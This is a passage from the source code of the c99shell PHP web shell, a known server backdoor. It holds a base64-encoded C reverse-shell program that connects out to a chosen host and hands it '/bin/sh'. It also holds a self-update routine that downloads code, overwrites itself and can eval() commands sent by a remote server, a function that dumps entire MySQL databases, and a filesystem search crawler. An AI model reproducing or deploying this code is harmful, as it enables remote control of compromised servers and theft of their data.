"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".

"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".

"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".

"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".

"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".

"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".

"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".

"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".

"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".

"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".

"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".

"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==");}

 else {return false;}

}

}

if (!function_exists("c99sh_getupdate"))

{

function c99sh_getupdate($update = true)

{

 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";

 $data = @file_get_contents($url);

 if (!$data) {return "Can't connect to update-server!";}

 else

 {

  $data = ltrim($data);

  $string = substr($data,3,ord($data{2}));

  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}

  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}

  if ($data{0} == "\x99" and $data{1} == "\x03")

  {

   $string = explode("\x01",$string);

   if ($update)

   {

    $confvars = array();

    $sourceurl = $string[0];

    $source = file_get_contents($sourceurl);

    if (!$source) {return "Can't fetch update!";}

    else

    {

     $fp = fopen(__FILE__,"w");

     if (!$fp) {return "Local error: can't write update to __FILE__! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}

     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}

    }

   }

   else {return "New version are available: ".$string[1];}

  }

  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}

  else {return "Error in protocol: segmentation failed! (".$data.") ";}

 }

}

}

if (!function_exists("mysql_dump"))

{

function mysql_dump($set)

{

 global $shver;

 $sock = $set["sock"];

 $db = $set["db"];

 $print = $set["print"];

 $nl2br = $set["nl2br"];

 $file = $set["file"];

 $add_drop = $set["add_drop"];

 $tabs = $set["tabs"];

 $onlytabs = $set["onlytabs"];

 $ret = array();

 $ret["err"] = array();

 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}

 if (empty($db)) {$db = "db";}

 if (empty($print)) {$print = 0;}

 if (empty($nl2br)) {$nl2br = 0;}

 if (empty($add_drop)) {$add_drop = true;}

 if (empty($file))

 {

  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";

 }

 if (!is_array($tabs)) {$tabs = array();}

 if (empty($add_drop)) {$add_drop = true;}

 if (sizeof($tabs) == 0)

 {

  // retrive tables-list

  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);

  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

 }

 $out = "# Dumped by C99Shell.SQL v. ".$shver."

# Home page: http://ccteam.ru

#

# Host settings:

# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."

# Date: ".date("d.m.Y H:i:s")."

# DB: \"".$db."\"

#---------------------------------------------------------

";

 $c = count($onlytabs);

 foreach($tabs as $tab)

 {

  if ((in_array($tab,$onlytabs)) or (!$c))

  {

   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}

   // recieve query for create table structure

   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

   if (!$res) {$ret["err"][] = mysql_smarterror();}

   else

   {

    $row = mysql_fetch_row($res);

    $out .= $row["1"].";\n\n";

    // recieve table variables

    $res = mysql_query("SELECT * FROM `$tab`", $sock);

    if (mysql_num_rows($res) > 0)

    {

     while ($row = mysql_fetch_assoc($res))

     {

      $keys = implode("`, `", array_keys($row));

      $values = array_values($row);

      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

      $values = implode("', '", $values);

      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";

      $out .= $sql;

     }

    }

   }

  }

 }

 $out .= "#---------------------------------------------------------------------------------\n\n";

 if ($file)

 {

  $fp = fopen($file, "w");

  if (!$fp) {$ret["err"][] = 2;}

  else

  {

   fwrite ($fp, $out);

   fclose ($fp);

  }

 }

 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

 return $out;

}

}

if (!function_exists("mysql_buildwhere"))

{

function mysql_buildwhere($array,$sep=" and",$functs=array())

{

 if (!is_array($array)) {$array = array();}

 $result = "";

 foreach($array as $k=>$v)

 {

  $value = "";

  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}

  $value .= "'".addslashes($v)."'";

  if (!empty($functs[$k])) {$value .= ")";}

  $result .= "`".$k."` = ".$value.$sep;

 }

 $result = substr($result,0,strlen($result)-strlen($sep));

 return $result;

}

}

if (!function_exists("mysql_fetch_all"))

{

function mysql_fetch_all($query,$sock)

{

 if ($sock) {$result = mysql_query($query,$sock);}

 else {$result = mysql_query($query);}

 $array = array();

 while ($row = mysql_fetch_array($result)) {$array[] = $row;}

 mysql_free_result($result);

 return $array;

}

}

if (!function_exists("mysql_smarterror"))

{

function mysql_smarterror($type,$sock)

{

 if ($sock) {$error = mysql_error($sock);}

 else {$error = mysql_error();}

 $error = htmlspecialchars($error);

 return $error;

}

}

if (!function_exists("mysql_query_form"))

{

function mysql_query_form()

{

 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;

 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

 if ((!$submit) or ($sql_act))

 {

  echo "<table border=0><tr><td><form action=\"".$sql_surl."\" name=\"c99sh_sqlquery\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=\"sql_act\" value=\"query\"><input type=hidden name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";

  if ($tbl_struct)

  {

   echo "<td valign=\"top\"><b>Fields:</b><br>";

   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}

   echo "</td></tr></table>";

  }

 }

 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}

}

}

if (!function_exists("mysql_create_db"))

{

function mysql_create_db($db,$sock="")

{

 $sql = "CREATE DATABASE `".addslashes($db)."`;";

 if ($sock) {return mysql_query($sql,$sock);}

 else {return mysql_query($sql);}

}

}

if (!function_exists("mysql_query_parse"))

{

function mysql_query_parse($query)

{

 $query = trim($query);

 $arr = explode (" ",$query);

 /*array array()

 {

  "METHOD"=>array(output_type),

  "METHOD1"...

  ...

 }

 if output_type == 0, no output,

 if output_type == 1, no output if no error

 if output_type == 2, output without control-buttons

 if output_type == 3, output with control-buttons

 */

 $types = array(

  "SELECT"=>array(3,1),

  "SHOW"=>array(2,1),

  "DELETE"=>array(1),

  "DROP"=>array(1)

 );

 $result = array();

 $op = strtoupper($arr[0]);

 if (is_array($types[$op]))

 {

  $result["propertions"] = $types[$op];

  $result["query"]  = $query;

  if ($types[$op] == 2)

  {

   foreach($arr as $k=>$v)

   {

    if (strtoupper($v) == "LIMIT")

    {

     $result["limit"] = $arr[$k+1];

     $result["limit"] = explode(",",$result["limit"]);

     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}

     unset($arr[$k],$arr[$k+1]);

    }

   }

  }

 }

 else {return false;}

}

}

if (!function_exists("c99fsearch"))

{

function c99fsearch($d)

{

 global $found;

 global $found_d;

 global $found_f;

 global $search_i_f;

 global $search_i_d;

 global $a;

 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

 $h = opendir($d);

 while (($f = readdir($h)) !== false)

 {

  if($f != "." && $f != "..")

  {

   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));

   if (is_dir($d.$f))

   {

    $search_i_d++;

    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

    if (!is_link($d.$f)) {c99fsearch($d.$f);}

   }

   else

   {

    $search_i_f++;

    if ($bool)

    {

     if (!empty($a["text"]))

     {

      $r = @file_get_contents($d.$f);

      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

      else {$bool = strpos(" ".$r,$a["text"],1);}

      if ($a["text_not"]) {$bool = !$bool;}

      if ($bool) {$found[] = $d.$f; $found_f++;}

     }

     else {$found[] = $d.$f; $found_f++;}

    }

   }

  }

 }

 closedir($h);

}

}

if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

//Sending headers

@ob_start();

@ob_implicit_flush(0);

function onphpshutdown()

{

 global $gzipencode,$ft;

 if (!headers_sent() and $gzipencode and !in_array($ft,array(&qu